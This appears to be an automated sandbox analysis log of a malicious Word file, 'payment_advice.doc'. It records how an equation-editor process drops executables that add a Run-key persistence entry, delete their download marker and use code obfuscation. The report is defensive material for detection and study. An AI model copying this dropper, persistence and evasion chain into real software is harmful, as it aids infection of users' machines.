Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Code function: 16_2_048C9630 16_2_048C9630
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Code function: 16_2_048C0B80 16_2_048C0B80
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Code function: 16_2_048C779A 16_2_048C779A
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Code function: 16_2_048C07A8 16_2_048C07A8
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Code function: 16_2_048C9818 16_2_048C9818
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Code function: 16_2_048C4D50 16_2_048C4D50
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Code function: 16_2_048C856C 16_2_048C856C
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Code function: 16_2_048C86D1 16_2_048C86D1
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Code function: 16_2_048C1AEA 16_2_048C1AEA
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Code function: 16_2_048C779A 16_2_048C779A
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Code function: 16_2_048C1B61 16_2_048C1B61
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\twox[1].exe D5582D586F46F61240CED5F4A44DAC22D5E2C7C0A48F63C964093DE0CBE49BC8
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\twox67345.exe D5582D586F46F61240CED5F4A44DAC22D5E2C7C0A48F63C964093DE0CBE49BC8
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe D5582D586F46F61240CED5F4A44DAC22D5E2C7C0A48F63C964093DE0CBE49BC8
Source: UGxXf.exe, 0000000B.00000002.2329057771.00000000002C7000.00000004.00000010.sdmp Binary or memory string: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbisualBasic.pdbPe$
Source: UGxXf.exe, 0000000B.00000002.2341228895.00000000054D1000.00000004.00000001.sdmp Binary or memory string: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb3E96C492651E889CC13F1415EBB53FAC1131AE0BD333C5EE6021672D9718EA31A8AEBD0DA0072F25D87DBA6FC90FFD598ED4DA35E44C398C454307E8E33B8426143DAEC
Source: UGxXf.exe, 0000000B.00000002.2341228895.00000000054D1000.00000004.00000001.sdmp Binary or memory string: :\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winDOC@20/9@10/3
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$yment_advice.doc Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRC6A8.tmp Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe Console Write: ....................P."...........W.a.i.t.i.n.g. .f.o.r. .1.....................................0.................&......................."..... Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe Console Write: ................................ .s.e.c.o.n.d.s.,. .p.r.e.s.s. .a. .k.e.y. .t.o. .c.o.n.t.i.n.u.e. ...............&.....J................."..... Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe Console Write: ..................................0.e.c.(.P.....t.......\.......T...............................e. ...............&.......................6s.... Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe Console Write: ..................................0.e.c.(.P.....t.......\.......T...............................e. ...............&.......................6s.... Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe Console Write: ......................!...........W.a.i.t.i.n.g. .f.o.r. .1.....$...............................................8.........................!..... Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe Console Write: ................................ .s.e.c.o.n.d.s.,. .p.r.e.s.s. .a. .k.e.y. .t.o. .c.o.n.t.i.n.u.e. .............8.......J.................!..... Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe Console Write: ..................................0.e.c.(.P.....T.......h.......l...............................e. .............8..........................s.... Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe Console Write: ..................................0.e.c.(.P.....T.......h.......l...............................e. .............8..........................s.... Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\user\AppData\Roaming\twox67345.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: payment_advice.doc ReversingLabs: Detection: 43%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown Process created: C:\Users\user\AppData\Roaming\twox67345.exe C:\Users\user\AppData\Roaming\twox67345.exe
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
Source: unknown Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
Source: unknown Process created: C:\Users\user\AppData\Roaming\twox67345.exe C:\Users\user\AppData\Roaming\twox67345.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\twox67345.exe C:\Users\user\AppData\Roaming\twox67345.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe 'C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe'
Source: unknown Process created: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe 'C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe'
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
Source: unknown Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
Source: unknown Process created: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\twox67345.exe C:\Users\user\AppData\Roaming\twox67345.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1 Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process created: C:\Users\user\AppData\Roaming\twox67345.exe C:\Users\user\AppData\Roaming\twox67345.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process created: C:\Users\user\AppData\Roaming\twox67345.exe C:\Users\user\AppData\Roaming\twox67345.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 1 Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1 Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process created: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 1 Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Roaming\twox67345.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: nVisualBasic.pdb source: UGxXf.exe, 0000000B.00000002.2329057771.00000000002C7000.00000004.00000010.sdmp
Source: Binary string: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbisualBasic.pdbPe$ source: UGxXf.exe, 0000000B.00000002.2329057771.00000000002C7000.00000004.00000010.sdmp
Source: Binary string: ,micC:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.PDBe source: UGxXf.exe, 0000000B.00000002.2329057771.00000000002C7000.00000004.00000010.sdmp
Source: Binary string: nLC:\Windows\Microsoft.VisualBasic.pdb source: UGxXf.exe, 0000000B.00000002.2329057771.00000000002C7000.00000004.00000010.sdmp
Source: Binary string: oC:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.PDB, source: UGxXf.exe, 0000000B.00000002.2329057771.00000000002C7000.00000004.00000010.sdmp
Source: Binary string: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb3E96C492651E889CC13F1415EBB53FAC1131AE0BD333C5EE6021672D9718EA31A8AEBD0DA0072F25D87DBA6FC90FFD598ED4DA35E44C398C454307E8E33B8426143DAEC source: UGxXf.exe, 0000000B.00000002.2341228895.00000000054D1000.00000004.00000001.sdmp
Source: Binary string: \REGISTRY\USER\S-1-5-21-966771315-3019405637-367336477-1006_Classes\Wow6432Node\CLSID\{0A29FF9E-7F9C-4UGxXf.PDB424491E3931}\Servererver32 source: UGxXf.exe, 0000000B.00000002.2329057771.00000000002C7000.00000004.00000010.sdmp
Source: Binary string: :\Windows\mscorlib.pdbpdblib.pdb source: UGxXf.exe, 0000000B.00000002.2329868830.00000000006EA000.00000004.00000020.sdmp
Source: Binary string: :\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: UGxXf.exe, 0000000B.00000002.2341228895.00000000054D1000.00000004.00000001.sdmp

Data Obfuscation:

barindex
Binary contains a suspicious time stamp
Source: initial sample Static PE information: 0xF27DBEB9 [Tue Dec 2 02:51:37 2098 UTC]
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Roaming\twox67345.exe Code function: 9_2_00614823 push ebp; ret 9_2_00614828
Source: C:\Users\user\AppData\Roaming\twox67345.exe Code function: 9_2_006139E0 pushad ; ret 9_2_006139E1
Source: C:\Users\user\AppData\Roaming\twox67345.exe Code function: 9_2_00612DFE push ebp; ret 9_2_00612E00
Source: C:\Users\user\AppData\Roaming\twox67345.exe Code function: 9_2_00613FD9 pushfd ; retf 9_2_00613FE1
Source: C:\Users\user\AppData\Roaming\twox67345.exe Code function: 9_2_023F6FBD push 8BFFFFFDh; retf 9_2_023F6FC3
Source: C:\Users\user\AppData\Roaming\twox67345.exe Code function: 9_2_023FA5A8 pushfd ; ret 9_2_023FA5AA
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Code function: 16_2_00B44823 push ebp; ret 16_2_00B44828
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Code function: 16_2_00B42DFE push ebp; ret 16_2_00B42E00
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Code function: 16_2_00B43FD9 pushfd ; retf 16_2_00B43FE1
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Code function: 16_2_048C6FB7 push 8BFFFFFDh; retf 16_2_048C6FC3

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\twox67345.exe Jump to dropped file
Source: C:\Users\user\AppData\Roaming\twox67345.exe File created: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\twox[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Roaming\twox67345.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ZozjABYW Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ZozjABYW Jump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\user\AppData\Roaming\twox67345.exe File opened: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe File opened: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
